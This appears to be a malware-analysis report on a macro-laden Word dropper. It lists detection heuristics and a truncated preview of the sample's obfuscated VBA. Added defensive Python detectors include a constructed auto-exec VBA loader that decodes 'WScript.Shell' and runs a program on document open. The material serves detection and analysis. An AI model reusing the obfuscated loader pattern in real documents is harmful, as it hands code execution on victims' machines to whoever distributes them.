Verdict: MALICIOUS
Risk Score: 330

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample contains heavily obfuscated VBA macros, including a Document_Open auto-exec loader. Critical heuristics flag Shell() and CreateObject calls, the usual mechanism for executing a downloaded payload. ClamAV's detection of the file as Doc.Dropper.Emodldr-6755244-0 further supports its role as a dropper.
Heuristics (9)

- ClamAV: Doc.Dropper.Emodldr-6755244-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
- VBA macros detected (medium, 6 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- Obfuscated auto-exec VBA loader (critical) [OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token removal via Replace) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents where source extraction failed, i.e. cases where no readable macro source is available.
- Environ() call (env variable access) (low) [OLE_VBA_ENVIRON]: Environ() call (env variable access)
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.iec.ch (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
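As an added example of how the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics above can be implemented (illustrative code written for this page, not the analyzer's own detector): the first function looks in extracted VBA source for the three decoder shapes the heuristic names, together with an auto-exec entry point and an execution sink; the second checks a compiled-stream blob for co-occurrence of an auto-exec token and execution tokens. The macro texts and the byte blob are constructed inputs, and the assumption that identifier names survive in the compiled stream as ASCII tokens bounded by non-identifier bytes is mine, not something the report states.

```python
import re

# Constructed macro in the loader shape the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
# heuristic describes: an auto-exec entry point, a numeric char array, a
# hex-string decode loop, junk-token removal via Replace, and a COM sink fed by
# the reconstructed strings. Illustrative input, not the page's sample.
LOADER_SRC = '''
Private Sub Document_Open()
    Dim a(5) As Integer, s As String, h As String, u As String
    a(0) = 87: a(1) = 83: a(2) = 99: a(3) = 114: a(4) = 105: a(5) = 112
    For i = 0 To 5
        s = s & Chr(a(i))
    Next i
    h = "742e5368656c6c"
    For j = 1 To Len(h) Step 2
        u = u & Chr(Val("&H" & Mid(h, j, 2)))
    Next j
    t = Replace("ca@@lc.e@@xe", "@@", "")
    Set o = CreateObject(s & u)
    o.Run t
End Sub
'''

# Constructed benign macro: auto-exec entry point, but no decoder and no sink.
BENIGN_SRC = '''
Private Sub Document_Open()
    MsgBox "Welcome"
End Sub
'''

AUTOEXEC = re.compile(r'\b(Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec|'
                      r'AutoClose|Document_Close)\b', re.I)
SINK = re.compile(r'\b(CreateObject|GetObject|Shell|ShellExecute|URLDownloadToFile)\b'
                  r'|\.(Run|Exec)\b', re.I)
# One regex per decoder shape named in the heuristic text.
DECODERS = {
    'numeric char-array': re.compile(
        r'\bArray\s*\(\s*\d+(?:\s*,\s*\d+){3,}|\b\w+\s*\(\s*\d+\s*\)\s*=\s*\d+\b'),
    'hex-string decode': re.compile(
        r'\bChrW?\s*\(\s*(?:&H|Val\s*\(\s*"&H")', re.I),
    'junk-token Replace': re.compile(
        r'\bReplace\s*\(\s*"[^"]*"\s*,\s*"[^"]*"\s*,\s*""\s*\)', re.I),
}


def classify_vba_source(src: str) -> dict:
    """Flag the loader shape: auto-exec entry + custom decoder + execution sink."""
    decoders = [name for name, rx in DECODERS.items() if rx.search(src)]
    autoexec = bool(AUTOEXEC.search(src))
    sink = bool(SINK.search(src))
    loader = autoexec and sink and bool(decoders)
    return {'autoexec': autoexec, 'sink': sink, 'decoders': decoders,
            'verdict': 'obfuscated auto-exec loader' if loader else 'no loader shape'}


# The OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic works on the compiled module stream
# instead of source text. Assumption for this example: identifier names survive
# in the stream as ASCII tokens delimited by non-identifier bytes, which is what
# the byte-level search below relies on. The blob is constructed, not a real stream.
PCODE_BLOB = (b'\x00\x01\x10Attribut\x00\x04Document_Open\x00\x00\x0cCreateObject'
              b'\x00\x03Run\x00\x07Runtime\x00\x01\x02')
AUTOEXEC_TOKENS = [b'Document_Open', b'AutoOpen', b'Auto_Open', b'Workbook_Open', b'AutoExec']
EXEC_TOKENS = [b'Shell', b'CreateObject', b'GetObject', b'URLDownloadToFile',
               b'Run', b'Exec', b'WScript']


def _token_present(blob: bytes, token: bytes) -> bool:
    # Bound the token so 'Run' does not match inside 'Runtime'.
    return re.search(rb'(?<![A-Za-z0-9_])' + re.escape(token) + rb'(?![A-Za-z0-9_])',
                     blob, re.I) is not None


def scan_compiled_stream(blob: bytes) -> dict:
    """Co-occurrence check: an auto-exec token plus at least one execution token."""
    auto = [t.decode() for t in AUTOEXEC_TOKENS if _token_present(blob, t)]
    execs = [t.decode() for t in EXEC_TOKENS if _token_present(blob, t)]
    return {'autoexec': auto, 'exec': execs, 'hit': bool(auto) and bool(execs)}


if __name__ == '__main__':
    print(classify_vba_source(LOADER_SRC))
    print(classify_vba_source(BENIGN_SRC))
    print(scan_compiled_stream(PCODE_BLOB))
```

The source-level check requires all three parts (entry point, decoder, sink) before it calls something a loader, which is why the benign Document_Open macro is not flagged; the stream-level check deliberately has no decoder condition, because once the source is gone only the identifier names remain to look at, and that is exactly the trade-off the heuristic's "high" rather than "critical" severity reflects.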
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 199425 bytes | b1ca751cecade245dec7bd864dd452bc390ce5e25455a4b32c54768088385df8 |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function DIrYUL(UdlSczD As String, otweswW As Integer, kEcLocE As Integer) As String
qyOmaZt = LTrim("u BWyoo@ mht")
KhvefzAgPz = RTrim("UeM-!Gh^]G QNT.l)]IP")
kaOewnp = RTrim("zoS$a RIUE)X")
BcQIxQmmh = LTrim("^Lgl!^!HKB!ylNZnjo")
XGTbt = LTrim("iXpvBorIJuw%goHul")
WPLodf = 1874 - 1202 - 829
FrifSf = 1381 + 851 + 715
For KdNEUy = 0 To 5
pEgtqoJhq = LTrim("oTyL[@RVYI]a")
WPLodf = 1374 + 1620 + 389
XGTbt = LTrim("jCND-J.ISR?UWJ")
WPLodf = 1979 - 795 - 253
WPLodf = "TVwZqbRgniY]zW-Ud" + "d]KYgGKIWt*GuILS" + "Ra&ET?a(GfSOcbgB%Y&"
FrifSf = Left("x]-d@fPyea@IW-uRt ", 3)
FrifSf = Left("vpE@X*GCQRHUgfa", 2)
SspeHpwaMBRJ = LTrim("&aWA.KiJ-nBTGw[mb!F$")
JzCLMCXsmF = Left("(eKHTd.]dQou@GX&e", 4)
Next KdNEUy
qyOmaZt = Space(8)
SspeHpwaMBRJ = RTrim("!^wue]pHmLTnB")
For UAlfqg = 0 To 2
While inpJNF < 1
yvqFrgZlnk = Right("!wZg*sp@YzPmvsxds", 5)
WPLodf = LTrim("Xuk^W.[a%gL")
FrifSf = Right("jAaBMp(kMH)u(Q^", 2)
inpJNF = inpJNF + 1
Wend
SspeHpwaMBRJ = Right("CBIWp@ZlsAYN#reNf_Y", 3)
QhjEKrxOs = 1787 - 1696 - 240
FrifSf = StrReverse("NM@pr)Vj_[")
FrifSf = UCase("Lly_xXIM%^")
Next UAlfqg
While klQAPQ < 2
qyOmaZt = RTrim("X&(Fl* AoXq")
QhjEKrxOs = StrReverse("TfbYxEa$mWNKaC#-O")
WPLodf = 1810 + 525 + 408
kaOewnp = "f [LWNM!URBckMbVtpJ" + "ZJjygDfsFUmSoCUD" + "CZCRFZ#.dDA"
qyOmaZt = "Jr)mC#vx.DrdTBG(NRAQ" + "TX$dwG qffBYYR)AFnL" + "aEd.]c&id$CO@Yj"
klQAPQ = klQAPQ + 1
Wend
KhvefzAgPz = UCase("(ZE!yng.mRX(Kyfs*n")
BuMHnTUdq = Space(20)
pEgtqoJhq = Right("$SkwR*C(]s!UP&Taq", 4)
JzCLMCXsmF = Left(" Dt$!xrHETwIy", 5)
While fECxKl < 3
qyOmaZt = " [MLHD.r!OIeAsQNw_^." + "DNCt^wDowPnkr-" + "[DTcOelmZC@!T"
TCNcQ = UCase("Oarg#OK&Cg^tqR")
pavVqpSoDxDA = LTrim("ArYWt#zd -BtbFzo")
WPLodf = 1015 + 777 + 1173
qyOmaZt = Right("_INq iWe#FsVKa!g", 5)
XGTbt = Left("Wf%Kzl^kGx", 4)
fECxKl = fECxKl + 1
Wend
kaOewnp = 562 - 336 - 1006
pEgtqoJhq = Left("qh#hirGDAi*K%F%mt*", 2)
yvqFrgZlnk = 711 + 1527 + 293
FrifSf = UCase("OrH-(AxZiQ?&t")
SspeHpwaMBRJ = Left("vrptwyB-UU$]@blbj", 4)
DIrYUL = "kSUcwCAUhHYJNMqyvEOTiC"
End Function
Private Function Dmybaq(YOiEWB As Boolean) As String
KhvefzAgPz = Right("ULuYINaz L", 5)
XGTbt = RTrim("&r!K@y%EPwnBk?.")
kaOewnp = StrReverse("?tZWrf%ES*WNDTKh[")
FrifSf = Right("@KYMNUF)-X$Pfhv", 4)
QhjEKrxOs = 1789 - 1184 - 713
WPLodf = RTrim("g#n^^chbyE[u*EDd")
JzCLMCXsmF = 529 - 977 - 1811
BuMHnTUdq = "pUM_E(x )?n" + "]V#!B.!FrY-gD" + "gylpf(C-Rfkn)zyd$W"
pEgtqoJhq = LTrim("gdBe-dvK*u.xB)sFH")
JzCLMCXsmF = LTrim("?CayoAq[gpcCSza")
TCNcQ = RTrim("S_b&ZJdw_XMOiNA.")
JzCLMCXsmF = LTrim("LY_@hcf.n?yh")
yvqFrgZlnk = RTrim("sTBxYeB!o(&U")
yvqFrgZlnk = Space(19)
KhvefzAgPz = 715 + 1384 + 1614
SspeHpwaMBRJ = "$uQzL*Pdf_N[hXawzUk(" + "HIbc$y.Om!l$g$G%ms" + "_A_eoW$$XtZUa"
kaOewnp = "@r).b(-c%)b[YS" + "qOTYFdA(W%" + ".VK)sltyL@k_LiH"
kaOewnp = Right("xdnysAZ@gF?mcM", 4)
pavVqpSoDxDA = Right("TUdNBBJ]R!#!%Nwy^_", 3)
pEgtqoJhq = RTrim("Wi$zcm*J.ULyznLM(")
KhvefzAgPz = RTrim("FuWudB#KO%EC*g@")
XGTbt = StrReverse("aRiCbTNpR&G*Yllr@r@h")
XGTbt = LTrim(")TFY exekxcexn")
pavVqpSoDxDA = "TpEV@! ZJcZ" + "e$Y])oXAkD^sV^n" + "PB#dFc-repSBe%YaE"
pEgtqoJhq = Left("iBohh#P!T i", 5)
While TpOozy < 4
For YqGpXD = 0 To 9
qyOmaZt = Space(18)
QhjEKrxOs = Space(7)
... (truncated)
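The preview above is dominated by junk statements: results of LTrim/RTrim/Left/Right/Space/StrReverse/UCase and small arithmetic stored into variables that are never read, wrapped in loops that do nothing, around a function that returns a constant. The following is an added example (written for this page, not part of the report or the analyzer) of a dead-store stripper that removes that padding so the real control flow of an extracted macros.bas can be read. Its input is a constructed excerpt modelled on the preview; the Document_Open body with a CreateObject(DIrYUL(...)) call is an assumption added so that something survives the cleanup, because the truncated preview does not show where DIrYUL's return value is consumed.

```python
import re

# Constructed excerpt shaped like the macros.bas preview: dead stores into
# never-read names, empty loops, a constant-returning function. The Document_Open
# body with a CreateObject sink is an assumption, not taken from the page.
JUNK_SRC = '''
Private Function DIrYUL(UdlSczD As String) As String
qyOmaZt = LTrim("u BWyoo@ mht")
WPLodf = 1874 - 1202 - 829
For KdNEUy = 0 To 5
pEgtqoJhq = LTrim("oTyL[@RVYI]a")
WPLodf = 1374 + 1620 + 389
Next KdNEUy
While inpJNF < 1
yvqFrgZlnk = Right("!wZg*sp@YzPmvsxds", 5)
inpJNF = inpJNF + 1
Wend
DIrYUL = "kSUcwCAUhHYJNMqyvEOTiC"
End Function
Private Sub Document_Open()
TCNcQ = UCase("Oarg#OK&Cg^tqR")
Set oBj = CreateObject(DIrYUL("x"))
End Sub
'''

IDENT = re.compile(r'[A-Za-z_]\w*')
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.*)$')          # plain 'x = ...', not 'Set x = ...'
HEADER = re.compile(r'^\s*(?:Private\s+|Public\s+)?(?:Function|Sub)\s+(\w+)', re.I)
END = re.compile(r'^\s*End\s+(?:Function|Sub)\b', re.I)
FOR, NEXT = re.compile(r'^\s*For\s+\w+\s*=', re.I), re.compile(r'^\s*Next\b', re.I)
WHILE, WEND = re.compile(r'^\s*While\b', re.I), re.compile(r'^\s*Wend\b', re.I)
INCR = re.compile(r'^\s*(\w+)\s*=\s*\1\s*\+\s*1\s*$', re.I)
# An assignment whose right-hand side has side effects is never a dead store.
SIDE_EFFECT = re.compile(r'\b(CreateObject|GetObject|Shell|Environ|Run|Exec)\b', re.I)


def strip_junk(src: str) -> str:
    """Remove dead stores, then loops that are left with no real body."""
    lines = [line.rstrip() for line in src.splitlines() if line.strip()]
    # Pass 1: a name is 'read' if it appears anywhere except as the LHS of its
    # own assignment. Assigning to the enclosing function's name is its return.
    reads = set()
    for line in lines:
        m = ASSIGN.match(line)
        reads.update(IDENT.findall(m.group(2) if m else line))
    kept, func = [], None
    for line in lines:
        h = HEADER.match(line)
        if h:
            func = h.group(1)
        m = ASSIGN.match(line)
        if (m and m.group(1) not in reads and m.group(1) != func
                and not SIDE_EFFECT.search(m.group(2))):
            continue                                   # dead store: drop it
        kept.append(line)
        if END.match(line):
            func = None
    # Pass 2: collapse For/Next with nothing inside, and While/Wend whose only
    # remaining body is the counter increment. Repeat to a fixed point.
    changed = True
    while changed:
        changed, out, i = False, [], 0
        while i < len(kept):
            line = kept[i]
            if FOR.match(line) and i + 1 < len(kept) and NEXT.match(kept[i + 1]):
                i, changed = i + 2, True
                continue
            if WHILE.match(line):
                j = i + 1
                while j < len(kept) and INCR.match(kept[j]):
                    j += 1
                if j < len(kept) and WEND.match(kept[j]):
                    i, changed = j + 1, True
                    continue
            out.append(line)
            i += 1
        kept = out
    return '\n'.join(kept)


def junk_ratio(src: str) -> float:
    """Fraction of non-blank lines removed; a high value is itself a signal."""
    before = len([line for line in src.splitlines() if line.strip()])
    after = len(strip_junk(src).splitlines())
    return round(1 - after / before, 2)


if __name__ == '__main__':
    print(strip_junk(JUNK_SRC))
    print('junk ratio:', junk_ratio(JUNK_SRC))
```

On the constructed excerpt the stripper leaves six lines: the DIrYUL header and its constant return, and the Document_Open body with its CreateObject call. The pass is deliberately conservative: Set statements, bare calls, function-return assignments and assignments whose right-hand side contains a CreateObject/Shell/Run-style call are never removed, so a sink hidden behind an unread variable (x = Shell(...)) survives. In an ordinary document macro a dead-store pass removes little or nothing, which is why the removal ratio is worth recording alongside the cleaned source.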